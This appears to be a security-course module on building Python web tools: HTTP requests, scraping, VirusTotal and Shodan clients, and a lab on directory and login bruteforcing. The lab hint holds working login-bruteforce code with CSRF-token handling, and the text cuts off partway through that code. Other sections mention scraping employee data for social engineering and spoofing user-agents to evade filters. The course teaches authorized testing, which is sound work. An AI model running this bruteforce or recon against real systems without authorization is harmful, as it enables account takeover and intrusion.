Build web security scanners and reconnaissance tools
Interact with security APIs (VirusTotal, Shodan, URLhaus)
Implement web scraping for OSINT gathering
Automate directory bruteforcing and subdomain enumeration
⚠️ Ethical Boundaries: Web scanning, scraping, and bruteforcing can be illegal if performed without authorization. Only test systems you own, explicitly authorized targets (like DVWA, HackTheBox), or public bug bounty programs. Violating this is a crime under the Computer Fraud and Abuse Act (CFAA) and similar laws globally.
Real-World Context: Tools like Burp Suite, OWASP ZAP, sqlmap, and Nikto all interact with web applications via HTTP. This week gives you the foundation to build custom scanners, automate bug bounty workflows, and integrate with security platforms. Skills align with SANS SEC573 Modules 2-3 (Web Security Automation) and Black Hat Python Chapter 5 (Web Hacking).
Section 1: HTTP Protocol Deep Dive
Understanding HTTP: The Web's Foundation
HTTP (HyperText Transfer Protocol) is a request-response protocol operating at Layer 7 (Application) of the OSI model. Every web interaction—from browsing Google to exploiting XSS—uses HTTP.
HTTP Request Anatomy
When your browser visits https://example.com/login?user=admin, it sends:
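A raw version of that request looks roughly like this (header values vary by browser; the blank line separates the headers from the optional body):

```
GET /login?user=admin HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Accept: text/html,application/xhtml+xml
Accept-Encoding: gzip, deflate
Connection: keep-alive

```

The first line carries the method, the path (including the query string), and the protocol version; everything after the blank line would be the request body (empty for a GET).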
```python
#!/usr/bin/env python3
"""
HTTP status codes relevant for security testing
"""

STATUS_CODES = {
    # 2xx Success
    200: 'OK - Request succeeded',
    201: 'Created - Resource created (POST success)',
    204: 'No Content - Success but no response body',
    # 3xx Redirection
    301: 'Moved Permanently - Resource relocated (follow redirect)',
    302: 'Found - Temporary redirect',
    304: 'Not Modified - Cached version is current',
    # 4xx Client Errors (important for scanning)
    400: 'Bad Request - Malformed request (may indicate WAF/filtering)',
    401: 'Unauthorized - Authentication required',
    403: 'Forbidden - Access denied (resource exists but restricted)',
    404: 'Not Found - Resource does not exist',
    405: 'Method Not Allowed - HTTP method rejected (e.g., DELETE blocked)',
    429: 'Too Many Requests - Rate limiting active',
    # 5xx Server Errors (potential vulnerabilities)
    500: 'Internal Server Error - Application crash (SQL errors, exceptions)',
    502: 'Bad Gateway - Proxy/gateway error',
    503: 'Service Unavailable - Server overloaded/down',
}

# Security insights from status codes:
# - 403 on /admin: directory exists but requires authentication
# - 404 vs 403: reveals whether a resource exists (information disclosure)
# - 500 errors: may leak stack traces, SQL errors (inject payloads to trigger)
# - 401 vs 403: test for authentication vs authorization flaws
```
Common HTTP Methods

| Method | Purpose | Security Testing Use |
|---|---|---|
| GET | Retrieve resource | Directory enumeration, XSS in URL params |
| POST | Submit data (forms, APIs) | SQLi, XSS, authentication bypass |
| PUT | Upload/replace resource | File upload vulns, unauthorized modifications |
| DELETE | Remove resource | Authorization bypass, IDOR testing |
| OPTIONS | Query allowed methods | CORS misconfig, method enumeration |
| HEAD | Get headers only (no body) | Fast resource existence checks |
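The OPTIONS row above can be put to work directly: a server that honors OPTIONS advertises its supported methods in the `Allow` response header. A minimal sketch — the `parse_allow_header` helper is my own naming and is pure, so it works offline; the network call assumes a reachable target:

```python
#!/usr/bin/env python3
"""Enumerate allowed HTTP methods via an OPTIONS request (sketch)."""


def parse_allow_header(allow: str) -> list:
    """Split an Allow header like 'GET, POST, HEAD' into a clean method list."""
    return [m.strip().upper() for m in allow.split(',') if m.strip()]


def enumerate_methods(url: str) -> list:
    """Send OPTIONS and return whatever methods the server advertises."""
    import requests  # imported here so the parser above stays dependency-free
    response = requests.options(url, timeout=5)
    return parse_allow_header(response.headers.get('Allow', ''))


if __name__ == '__main__':
    # Offline demo of the parser; point enumerate_methods() at an authorized target.
    print(parse_allow_header('GET, POST, HEAD, OPTIONS'))
```

Note that many servers omit or lie in `Allow`; actively probing each method (and watching for 405s) is the more reliable, if noisier, check.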
Section 2: Python's requests Library
Why requests (Not urllib)?
Python's built-in urllib works, but it is verbose. requests (created by Kenneth Reitz) is the industry standard for HTTP work.
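To see the difference, compare building the same GET request both ways. Nothing is sent here — `requests.Request(...).prepare()` just shows the final wire form, so this runs offline:

```python
#!/usr/bin/env python3
"""urllib vs requests: building the same GET request (nothing is sent)."""
import urllib.request

import requests

URL = 'https://httpbin.org/get'

# urllib: create a Request object, then attach each header by hand
urllib_req = urllib.request.Request(URL)
urllib_req.add_header('User-Agent', 'Scanner/1.0')

# requests: declare everything in one constructor; .prepare() shows the result
prepared = requests.Request('GET', URL,
                            headers={'User-Agent': 'Scanner/1.0'}).prepare()

print(urllib_req.get_header('User-agent'))  # urllib capitalizes header names
print(prepared.headers['User-Agent'])
print(prepared.method, prepared.url)
```

The gap widens fast once sessions, redirects, and multipart bodies are involved, which is why the rest of this week uses requests exclusively.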
```bash
# Install requests
pip install requests
```
Basic GET Request
```python
#!/usr/bin/env python3
"""
Simple HTTP GET request with requests library
"""
import requests


def basic_get_request(url: str) -> None:
    """
    Perform GET request and display response.

    Args:
        url: Target URL
    """
    try:
        # Send GET request
        response = requests.get(url, timeout=5)

        # Status code
        print(f"[*] Status: {response.status_code}")

        # Headers (dict)
        print(f"[*] Server: {response.headers.get('Server', 'Unknown')}")
        print(f"[*] Content-Type: {response.headers.get('Content-Type')}")

        # Response body
        print(f"\n[*] Response body (first 500 chars):")
        print(response.text[:500])

        # Or access raw bytes
        # print(response.content[:500])

    except requests.exceptions.Timeout:
        print(f"[!] Request timeout for {url}")
    except requests.exceptions.ConnectionError:
        print(f"[!] Connection error to {url}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")


# Usage
if __name__ == '__main__':
    basic_get_request('https://httpbin.org/get')
```
Custom Headers and User-Agents
Many web apps block default Python user-agents. Customize headers to bypass simple filters:
```python
#!/usr/bin/env python3
"""
Custom headers for stealthy requests
"""
import requests


def request_with_custom_headers(url: str) -> None:
    """
    Send request with custom headers.
    """
    # Custom headers dict
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
    }

    response = requests.get(url, headers=headers, timeout=5)

    print(f"[*] Status: {response.status_code}")
    print(f"[*] Response length: {len(response.content)} bytes")

    # Confirm which User-Agent was actually sent
    if 'User-Agent' in response.request.headers:
        print(f"[*] User-Agent sent: {response.request.headers['User-Agent']}")


# Common User-Agents for testing
USER_AGENTS = {
    'chrome_windows': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
    'firefox_linux': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/121.0',
    'mobile_ios': 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15',
    'googlebot': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
    'python_default': 'python-requests/2.31.0',  # Default (often blocked)
}

if __name__ == '__main__':
    request_with_custom_headers('https://httpbin.org/headers')
```
POST Requests: Form Data and JSON
```python
#!/usr/bin/env python3
"""
POST requests with form data and JSON payloads
"""
import json

import requests


# Example 1: Form data (like HTML form submission)
def post_form_data(url: str, username: str, password: str) -> None:
    """
    Submit login form (application/x-www-form-urlencoded).
    """
    data = {
        'username': username,
        'password': password,
        'submit': 'Login'
    }

    response = requests.post(url, data=data, timeout=5)
    print(f"[*] Status: {response.status_code}")
    print(f"[*] Response:\n{response.text[:500]}")


# Example 2: JSON payload (modern APIs)
def post_json_data(url: str, payload: dict) -> None:
    """
    Send JSON data (application/json).
    """
    # requests automatically sets Content-Type: application/json
    response = requests.post(url, json=payload, timeout=5)
    print(f"[*] Status: {response.status_code}")

    # Parse JSON response
    try:
        response_json = response.json()
        print(f"[*] JSON Response: {json.dumps(response_json, indent=2)}")
    except json.JSONDecodeError:
        print(f"[*] Non-JSON response: {response.text[:200]}")


# Example 3: Multipart form data (file uploads)
def post_file_upload(url: str, file_path: str) -> None:
    """
    Upload file (multipart/form-data).
    """
    with open(file_path, 'rb') as f:
        files = {
            'file': ('upload.txt', f, 'text/plain')
        }
        # Additional form fields
        data = {
            'description': 'Test upload'
        }
        response = requests.post(url, files=files, data=data, timeout=10)

    print(f"[*] Status: {response.status_code}")
    print(f"[*] Response: {response.text[:300]}")


if __name__ == '__main__':
    # Test form login
    post_form_data('https://httpbin.org/post', 'admin', 'password123')

    # Test JSON API
    payload = {
        'action': 'search',
        'query': 'vulnerability',
        'limit': 10
    }
    post_json_data('https://httpbin.org/post', payload)
```
Session Management and Cookies
Sessions persist cookies and reuse pooled connections across requests:
```python
#!/usr/bin/env python3
"""
Session management for authenticated testing
"""
import requests


def session_based_requests() -> None:
    """
    Use Session object to maintain cookies across requests.
    """
    # Create session
    session = requests.Session()

    # Set default headers for all requests in this session
    session.headers.update({
        'User-Agent': 'SecurityScanner/1.0'
    })

    # Step 1: Login (server sets session cookie)
    login_url = 'https://httpbin.org/cookies/set/sessionid/abc123xyz'
    response = session.get(login_url)
    print(f"[*] Login response: {response.status_code}")
    print(f"[*] Cookies set: {session.cookies.get_dict()}")

    # Step 2: Access protected resource (session cookie automatically sent)
    protected_url = 'https://httpbin.org/cookies'
    response = session.get(protected_url)
    print(f"\n[*] Protected resource response:")
    print(response.text)

    # Step 3: Manual cookie manipulation
    session.cookies.set('custom_token', 'my_value', domain='httpbin.org')
    response = session.get('https://httpbin.org/cookies')
    print(f"\n[*] After adding custom cookie:")
    print(response.text)


def cookie_extraction_example() -> None:
    """
    Extract and analyze cookies from response.
    """
    # Set-Cookie arrives on the 302 redirect, so don't follow it:
    # response.cookies only holds cookies from the final response otherwise.
    response = requests.get('https://httpbin.org/cookies/set?token=secret123',
                            allow_redirects=False)

    # Get all cookies
    cookies = response.cookies
    print("[*] Cookies received:")
    for cookie in cookies:
        print(f"  - {cookie.name} = {cookie.value}")
        print(f"    Domain: {cookie.domain}")
        print(f"    Path: {cookie.path}")
        print(f"    Secure: {cookie.secure}")
        print(f"    HttpOnly: {cookie.has_nonstandard_attr('HttpOnly')}")


if __name__ == '__main__':
    session_based_requests()
    print("\n" + "="*60 + "\n")
    cookie_extraction_example()
```
Handling Redirects and SSL
```python
#!/usr/bin/env python3
"""
Redirect handling and SSL verification
"""
import requests
import urllib3

# verify=False would otherwise emit an InsecureRequestWarning on every request
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def handle_redirects(url: str) -> None:
    """
    Control redirect behavior.
    """
    # Follow redirects (default behavior)
    response = requests.get(url, allow_redirects=True)
    print(f"[*] Final URL: {response.url}")
    print(f"[*] Status: {response.status_code}")
    print(f"[*] Redirect history: {[r.status_code for r in response.history]}")

    print("\n" + "-"*60 + "\n")

    # Don't follow redirects (useful for detecting redirects)
    response = requests.get(url, allow_redirects=False)
    print(f"[*] Status without following: {response.status_code}")
    if 300 <= response.status_code < 400:
        redirect_location = response.headers.get('Location')
        print(f"[*] Redirects to: {redirect_location}")


def ssl_verification_options(url: str) -> None:
    """
    SSL/TLS certificate verification options.
    """
    # Verify SSL certificate (default, recommended)
    try:
        response = requests.get(url, verify=True, timeout=5)
        print(f"[✓] SSL verification passed: {response.status_code}")
    except requests.exceptions.SSLError as e:
        print(f"[!] SSL verification failed: {e}")

    # Disable SSL verification (NOT recommended for production)
    # Useful for testing self-signed certs in labs
    try:
        response = requests.get(url, verify=False, timeout=5)
        print(f"[*] Request with verify=False: {response.status_code}")
    except Exception as e:
        print(f"[!] Request failed: {e}")


if __name__ == '__main__':
    # Test redirect handling
    handle_redirects('http://github.com')  # Redirects to https

    print("\n" + "="*60 + "\n")

    # Test SSL verification
    ssl_verification_options('https://self-signed.badssl.com/')
```
Section 3: Web Scraping with BeautifulSoup
Why Web Scraping for Security?
Web scraping automates OSINT gathering:
Extract subdomains from certificate transparency logs
Scrape public employee data from LinkedIn for social engineering
Parse vulnerability databases (CVE, ExploitDB)
Monitor paste sites for leaked credentials
Collect threat intelligence from security blogs
```bash
# Install BeautifulSoup4 and parser
pip install beautifulsoup4 lxml
```
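As a concrete example of the first OSINT item above, crt.sh exposes certificate-transparency results as JSON (e.g. `https://crt.sh/?q=%25.example.com&output=json`). The parsing helper below is my own naming and is pure, so the live lookup is left commented out as a hedged sketch:

```python
#!/usr/bin/env python3
"""Subdomain extraction from crt.sh certificate-transparency JSON (sketch)."""


def extract_subdomains(records: list, domain: str) -> list:
    """Collect unique hostnames under the target domain from crt.sh records.

    Each crt.sh record has a 'name_value' field that may contain several
    newline-separated names, including wildcards like *.example.com.
    """
    found = set()
    for record in records:
        for name in record.get('name_value', '').split('\n'):
            name = name.strip().lower().lstrip('*.')
            if name == domain or name.endswith('.' + domain):
                found.add(name)
    return sorted(found)


if __name__ == '__main__':
    # Live lookup (network required; crt.sh rate-limits aggressive clients):
    # import requests
    # resp = requests.get('https://crt.sh/?q=%25.example.com&output=json',
    #                     timeout=30)
    # print(extract_subdomains(resp.json(), 'example.com'))
    sample = [{'name_value': 'www.example.com\n*.dev.example.com'},
              {'name_value': 'mail.example.com'}]
    print(extract_subdomains(sample, 'example.com'))
```

Splitting the pure parser from the network call like this also makes the tool easy to unit test with canned API responses.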
Basic HTML Parsing
```python
#!/usr/bin/env python3
"""
Basic web scraping with BeautifulSoup
"""
import requests
from bs4 import BeautifulSoup


def scrape_basic_example(url: str) -> None:
    """
    Scrape and parse HTML content.
    """
    # Fetch page
    response = requests.get(url, timeout=10)

    if response.status_code != 200:
        print(f"[!] Failed to fetch {url}: {response.status_code}")
        return

    # Parse HTML
    soup = BeautifulSoup(response.content, 'lxml')

    # Extract title
    title = soup.title.string if soup.title else "No title"
    print(f"[*] Page Title: {title}")

    # Find all links
    print(f"\n[*] Links found:")
    links = soup.find_all('a', href=True)
    for link in links[:10]:  # First 10 links
        href = link['href']
        text = link.get_text(strip=True)
        print(f"  - {text[:50]}: {href}")

    # Find all images
    print(f"\n[*] Images found:")
    images = soup.find_all('img', src=True)
    for img in images[:5]:
        src = img['src']
        alt = img.get('alt', 'No alt text')
        print(f"  - {alt}: {src}")


def extract_forms(url: str) -> None:
    """
    Extract all forms from a page (useful for testing).
    """
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.content, 'lxml')

    forms = soup.find_all('form')
    print(f"[*] Found {len(forms)} forms on {url}")

    for i, form in enumerate(forms, 1):
        print(f"\n[Form {i}]")
        print(f"  Action: {form.get('action', 'None')}")
        print(f"  Method: {form.get('method', 'GET').upper()}")

        # Extract input fields
        inputs = form.find_all('input')
        print(f"  Input fields:")
        for inp in inputs:
            name = inp.get('name', 'unnamed')
            input_type = inp.get('type', 'text')
            value = inp.get('value', '')
            print(f"    - {name} (type={input_type}, value={value})")


def scrape_security_blog() -> None:
    """
    Example: Scrape latest security advisories.
    """
    url = 'https://www.exploit-db.com/'

    try:
        response = requests.get(url, timeout=10)
        soup = BeautifulSoup(response.content, 'lxml')

        # Find exploit titles (example structure, may change)
        # This demonstrates the technique; actual selectors depend on the site
        exploits = soup.find_all('a', class_='exploit-link')[:5]

        print(f"[*] Recent exploits from ExploitDB:")
        for exploit in exploits:
            title = exploit.get_text(strip=True)
            link = exploit['href']
            print(f"  - {title}")
            print(f"    {link}\n")
    except Exception as e:
        print(f"[!] Scraping failed: {e}")


if __name__ == '__main__':
    # Example: Scrape httpbin test page
    scrape_basic_example('https://httpbin.org/html')

    print("\n" + "="*60 + "\n")

    # Extract forms
    extract_forms('https://httpbin.org/forms/post')
```
CSS Selectors for Precise Extraction
```python
#!/usr/bin/env python3
"""
Using CSS selectors for precise data extraction
"""
import requests
from bs4 import BeautifulSoup


def css_selector_examples(url: str) -> None:
    """
    Demonstrate CSS selector usage.
    """
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.content, 'lxml')

    # Select by ID
    element = soup.select_one('#specific-id')
    if element:
        print(f"[*] Element with ID: {element.get_text(strip=True)}")

    # Select by class
    elements = soup.select('.class-name')
    print(f"[*] Elements with class: {len(elements)}")

    # Select by tag and class
    divs = soup.select('div.container')
    print(f"[*] Div containers: {len(divs)}")

    # Select nested elements
    links_in_nav = soup.select('nav a')
    print(f"[*] Links in navigation: {len(links_in_nav)}")

    # Select by attribute
    external_links = soup.select('a[target="_blank"]')
    print(f"[*] External links: {len(external_links)}")

    # Select specific children
    first_paragraph = soup.select_one('div.content > p:first-child')
    if first_paragraph:
        print(f"[*] First paragraph: {first_paragraph.get_text(strip=True)[:100]}")


# Common CSS selectors for security testing
"""
Selector              | Matches
----------------------|----------------------------------
#id                   | Element with id="id"
.class                | Elements with class="class"
tag                   | All <tag> elements
tag.class             | <tag> elements with class="class"
tag#id                | <tag> element with id="id"
parent > child        | Direct child
ancestor descendant   | Any descendant
[attribute]           | Elements with attribute
[attribute=value]     | Specific attribute value
:first-child          | First child element
:nth-child(n)         | Nth child element
"""


def scrape_table_data(url: str) -> None:
    """
    Extract data from HTML tables.
    """
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.content, 'lxml')

    # Find all tables
    tables = soup.find_all('table')

    for i, table in enumerate(tables, 1):
        print(f"\n[Table {i}]")

        # Extract headers
        headers = []
        header_row = table.find('thead')
        if header_row:
            headers = [th.get_text(strip=True) for th in header_row.find_all('th')]
            print(f"  Headers: {headers}")

        # Extract rows
        rows = table.find_all('tr')
        print(f"  Rows: {len(rows)}")

        for row in rows[:3]:  # First 3 rows
            cells = [td.get_text(strip=True) for td in row.find_all('td')]
            if cells:
                print(f"    {cells}")


if __name__ == '__main__':
    css_selector_examples('https://example.com')
```
Handling Dynamic Content
BeautifulSoup only parses static HTML. For JavaScript-rendered content, use Selenium:
```python
#!/usr/bin/env python3
"""
Scraping JavaScript-heavy sites with Selenium
(For when BeautifulSoup can't access dynamic content)
"""
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options


def scrape_with_selenium(url: str) -> None:
    """
    Use Selenium for JavaScript-rendered pages.
    """
    # Setup headless Chrome
    chrome_options = Options()
    chrome_options.add_argument('--headless')  # Run without GUI
    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--disable-dev-shm-usage')

    # Initialize driver
    driver = webdriver.Chrome(options=chrome_options)

    try:
        # Load page
        driver.get(url)

        # Wait for specific element to load (max 10 seconds)
        wait = WebDriverWait(driver, 10)
        element = wait.until(
            EC.presence_of_element_located((By.CLASS_NAME, 'dynamic-content'))
        )

        # Extract data
        print(f"[*] Page title: {driver.title}")

        # Find elements
        links = driver.find_elements(By.TAG_NAME, 'a')
        print(f"[*] Links found: {len(links)}")
        for link in links[:5]:
            print(f"  - {link.text}: {link.get_attribute('href')}")

        # Execute JavaScript
        result = driver.execute_script("return document.body.innerHTML;")
        print(f"\n[*] Page HTML length: {len(result)} chars")

    except Exception as e:
        print(f"[!] Selenium error: {e}")
    finally:
        driver.quit()


# Note: Install selenium and chromedriver:
#   pip install selenium
#   brew install chromedriver            # macOS
#   apt install chromium-chromedriver    # Linux
```
Section 4: REST APIs and Security Data Sources
Working with Security APIs
Many security platforms provide APIs for threat intelligence, vulnerability data, and scanning:
VirusTotal: File/URL reputation, malware analysis
Shodan: Internet-connected device search
URLhaus: Malware URL database
AbuseIPDB: IP reputation and abuse reports
Have I Been Pwned: Breach notification
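URLhaus is the simplest of these to start with: its public v1 API takes a plain form-encoded POST and returns JSON. The endpoint and field names below follow the abuse.ch docs as I know them (verify against urlhaus-api.abuse.ch, and note that abuse.ch may require an `Auth-Key` header); `summarize_urlhaus` is my own helper, kept pure so it runs offline:

```python
#!/usr/bin/env python3
"""URLhaus host lookup (sketch; endpoint/fields per the public v1 API)."""


def summarize_urlhaus(result: dict) -> str:
    """Reduce a URLhaus host-query response to a one-line verdict."""
    status = result.get('query_status')
    if status != 'ok':
        return f'no data ({status})'
    urls = result.get('urls') or []
    online = sum(1 for u in urls if u.get('url_status') == 'online')
    return f'{len(urls)} malware URLs known, {online} currently online'


if __name__ == '__main__':
    # Live query (network required; may need an Auth-Key header):
    # import requests
    # resp = requests.post('https://urlhaus-api.abuse.ch/v1/host/',
    #                      data={'host': 'example.com'}, timeout=10)
    # print(summarize_urlhaus(resp.json()))
    sample = {'query_status': 'ok',
              'urls': [{'url_status': 'online'}, {'url_status': 'offline'}]}
    print(summarize_urlhaus(sample))
```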
VirusTotal API Example
```python
#!/usr/bin/env python3
"""
VirusTotal API integration for URL/file reputation checks
"""
import time

import requests


class VirusTotalClient:
    """
    VirusTotal API client for security checks.
    """

    def __init__(self, api_key: str):
        """
        Initialize with API key (get free key from virustotal.com).
        """
        self.api_key = api_key
        self.base_url = 'https://www.virustotal.com/api/v3'
        self.headers = {
            'x-apikey': self.api_key,
            'Accept': 'application/json'
        }

    def check_url(self, url: str) -> dict:
        """
        Check URL reputation.

        Returns:
            API response dict
        """
        # Submit URL for scanning
        scan_url = f'{self.base_url}/urls'
        data = {'url': url}

        response = requests.post(scan_url, headers=self.headers, data=data)
        if response.status_code != 200:
            return {'error': f'API error: {response.status_code}'}

        result = response.json()

        # Get scan ID
        scan_id = result['data']['id']

        # Wait for analysis to complete
        print(f"[*] Scanning {url}... (ID: {scan_id})")
        time.sleep(15)  # VirusTotal needs time to analyze

        # Get results
        analysis_url = f'{self.base_url}/analyses/{scan_id}'
        response = requests.get(analysis_url, headers=self.headers)

        if response.status_code == 200:
            return response.json()
        else:
            return {'error': f'Failed to get results: {response.status_code}'}

    def check_file_hash(self, file_hash: str) -> dict:
        """
        Check file hash (MD5, SHA1, or SHA256).

        Returns:
            Detection results
        """
        url = f'{self.base_url}/files/{file_hash}'
        response = requests.get(url, headers=self.headers)

        if response.status_code == 200:
            return response.json()
        elif response.status_code == 404:
            return {'error': 'File not found in VirusTotal database'}
        else:
            return {'error': f'API error: {response.status_code}'}

    def parse_results(self, results: dict) -> None:
        """
        Parse and display scan results.
        """
        if 'error' in results:
            print(f"[!] {results['error']}")
            return

        try:
            stats = results['data']['attributes']['stats']
            print(f"\n[*] Scan Results:")
            print(f"  Malicious:  {stats.get('malicious', 0)}")
            print(f"  Suspicious: {stats.get('suspicious', 0)}")
            print(f"  Harmless:   {stats.get('harmless', 0)}")
            print(f"  Undetected: {stats.get('undetected', 0)}")

            # Verdict
            if stats.get('malicious', 0) > 0:
                print(f"\n[!] WARNING: Detected as malicious by {stats['malicious']} engines!")
            else:
                print(f"\n[✓] No malicious detections")
        except KeyError as e:
            print(f"[!] Error parsing results: {e}")


# Usage example
if __name__ == '__main__':
    # Get your free API key from: https://www.virustotal.com/gui/join-us
    API_KEY = 'YOUR_API_KEY_HERE'

    vt = VirusTotalClient(API_KEY)

    # Check suspicious URL
    # results = vt.check_url('http://malware-traffic-analysis.net')
    # vt.parse_results(results)

    # Check file hash
    # malware_hash = 'd41d8cd98f00b204e9800998ecf8427e'  # Example MD5
    # results = vt.check_file_hash(malware_hash)
    # vt.parse_results(results)

    print("[!] Set API_KEY to use this example")
```
Shodan API Example
```python
#!/usr/bin/env python3
"""
Shodan API for internet-connected device reconnaissance
"""
import requests


class ShodanClient:
    """
    Shodan API client for device search.
    """

    def __init__(self, api_key: str):
        """
        Initialize with Shodan API key (get from shodan.io).
        """
        self.api_key = api_key
        self.base_url = 'https://api.shodan.io'

    def search(self, query: str, limit: int = 10) -> dict:
        """
        Search Shodan for devices matching query.

        Args:
            query: Search query (e.g., 'apache', 'port:22', 'country:US')
            limit: Max results to return

        Returns:
            Search results dict
        """
        url = f'{self.base_url}/shodan/host/search'
        params = {
            'key': self.api_key,
            'query': query,
            'limit': limit
        }

        try:
            response = requests.get(url, params=params, timeout=10)
            if response.status_code == 200:
                return response.json()
            else:
                return {'error': f'API error: {response.status_code}'}
        except requests.exceptions.RequestException as e:
            return {'error': f'Request failed: {e}'}

    def get_host_info(self, ip: str) -> dict:
        """
        Get detailed information about an IP address.

        Args:
            ip: Target IP address

        Returns:
            Host information dict
        """
        url = f'{self.base_url}/shodan/host/{ip}'
        params = {'key': self.api_key}

        try:
            response = requests.get(url, params=params, timeout=10)
            if response.status_code == 200:
                return response.json()
            else:
                return {'error': f'API error: {response.status_code}'}
        except requests.exceptions.RequestException as e:
            return {'error': f'Request failed: {e}'}

    def parse_search_results(self, results: dict) -> None:
        """
        Parse and display Shodan search results.
        """
        if 'error' in results:
            print(f"[!] {results['error']}")
            return

        matches = results.get('matches', [])
        total = results.get('total', 0)

        print(f"[*] Total results: {total}")
        print(f"[*] Showing: {len(matches)}\n")

        for i, match in enumerate(matches, 1):
            ip = match.get('ip_str', 'Unknown')
            port = match.get('port', 0)
            org = match.get('org', 'Unknown')
            location = match.get('location', {})
            country = location.get('country_name', 'Unknown')

            print(f"[{i}] {ip}:{port}")
            print(f"    Organization: {org}")
            print(f"    Location: {country}")

            # Display banner (first 200 chars)
            banner = match.get('data', '')
            if banner:
                print(f"    Banner: {banner[:200]}")
            print()


# Usage
if __name__ == '__main__':
    API_KEY = 'YOUR_SHODAN_API_KEY'

    shodan = ShodanClient(API_KEY)

    # Search for Apache servers
    # results = shodan.search('apache', limit=5)
    # shodan.parse_search_results(results)

    # Get info about specific IP
    # info = shodan.get_host_info('8.8.8.8')
    # print(info)

    print("[!] Set API_KEY to use this example")
```
Lab 6: HTTP Security Tools
⚠️ Authorization Required: Only test against systems you own, authorized targets (DVWA, HackTheBox), or public bug bounty programs with explicit permission. Unauthorized scanning is illegal.
⏱️ 135 minutes total · Difficulty: Intermediate
Part 1: Directory Bruteforcer (35 minutes)
Objective: Build a tool to discover hidden directories and files on web servers.
Requirements:
Create dirbrute.py that:
Accepts target URL and wordlist file as arguments
Tests each word as a directory/file path
Identifies valid paths (200, 301, 302, 403 status codes)
⚠️ CRITICAL: Only test on systems you own or have explicit written permission to test.
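A minimal sketch meeting the requirements above — the "interesting" status set, the request delay, and the `build_target` helper are my own choices; the lab expects you to extend this with threading, output formatting, and argument parsing:

```python
#!/usr/bin/env python3
"""dirbrute.py sketch: probe candidate paths from a wordlist."""
import time

import requests

# Status codes worth reporting (per the requirements above)
INTERESTING = {200, 301, 302, 403}


def build_target(base_url: str, word: str) -> str:
    """Join base URL and candidate path without doubling slashes."""
    return base_url.rstrip('/') + '/' + word.lstrip('/')


def dirbrute(base_url: str, wordlist_path: str, delay: float = 0.2) -> None:
    """Request each wordlist entry as a path and report interesting hits."""
    with open(wordlist_path) as f:
        words = [line.strip() for line in f if line.strip()]

    for word in words:
        target = build_target(base_url, word)
        try:
            # Don't follow redirects: a 301/302 is itself a useful signal
            resp = requests.get(target, timeout=5, allow_redirects=False)
            if resp.status_code in INTERESTING:
                print(f'[+] {resp.status_code} {target}')
        except requests.exceptions.RequestException:
            pass  # unreachable paths are expected noise
        time.sleep(delay)  # be polite; avoid tripping rate limits


if __name__ == '__main__':
    # Offline demo of the URL builder; run dirbrute() only against
    # a target you are authorized to test, e.g.:
    # dirbrute('http://target.lab', 'wordlist.txt')
    print(build_target('http://target.lab/', '/admin'))
```

Wiring `sys.argv` (or argparse) to the target URL and wordlist path satisfies the "accepts arguments" requirement.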
Part 2: Login Form Bruteforcer
Success Criteria:
Successfully logs in with correct credentials from wordlist
Handles CSRF token extraction and submission
Rate limiting prevents account lockout
Detects login success based on response analysis
Hint: Form Parsing and CSRF Handling
```python
import time
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup


def extract_form_fields(url: str, form_id: str = None) -> dict:
    """
    Extract form fields from login page.
    """
    session = requests.Session()
    response = session.get(url)
    soup = BeautifulSoup(response.content, 'lxml')

    # Find login form
    if form_id:
        form = soup.find('form', id=form_id)
    else:
        form = soup.find('form')  # First form

    if not form:
        return None

    fields = {}

    # Extract all input fields
    for input_tag in form.find_all('input'):
        name = input_tag.get('name')
        value = input_tag.get('value', '')
        if name:
            fields[name] = value

    return {
        'session': session,
        'action': form.get('action'),
        'method': form.get('method', 'post').upper(),
        'fields': fields
    }


def bruteforce_login(url: str, username: str, passwords: list) -> None:
    """
    Bruteforce login form.
    """
    # Get form structure
    form_data = extract_form_fields(url)
    if not form_data:
        print("[!] Could not find login form")
        return

    session = form_data['session']
    fields = form_data['fields']
    action = form_data['action'] or ''  # forms without an action post back to the page

    # Determine username and password field names
    # (Usually 'username'/'user' and 'password'/'pass')
    username_field = None
    password_field = None

    for field_name in fields.keys():
        if 'user' in field_name.lower():
            username_field = field_name
        elif 'pass' in field_name.lower():
            password_field = field_name

    if not username_field or not password_field:
        print("[!] Could not identify username/password fields")
        print(f"[*] Available fields: {list(fields.keys())}")
        return

    print(f"[*] Username field: {username_field}")
    print(f"[*] Password field: {password_field}")
    print(f"[*] Testing {len(passwords)} passwords...\n")

    # Build full action URL
    if action.startswith('http'):
        submit_url = action
    elif action.startswith('/'):
        parsed = urlparse(url)
        submit_url = f"{parsed.scheme}://{parsed.netloc}{action}"
    else:
        submit_url = url

    # Try each password
    for password in passwords:
        # Fill in the credential fields
        fields[username_field] = username
        fields[password_field] = password

        # Re-extract CSRF token if needed
        response = session.get(url)
        soup = BeautifulSoup(response.content, 'lxml')
        csrf_input = soup.find('input', {'name': 'csrf_token'})
        if csrf_input:
            fields['csrf_token'] = csrf_input.get('value')

        # Submit form; don't follow redirects, or the 302 success
        # signal below would never be observed
        try:
            response = session.post(submit_url, data=fields, timeout=10,
                                    allow_redirects=False)

            # Check for successful login
            # (Customize based on application behavior)
            if response.status_code == 302:  # Redirect
                print(f"[✓] SUCCESS! Password: {password}")
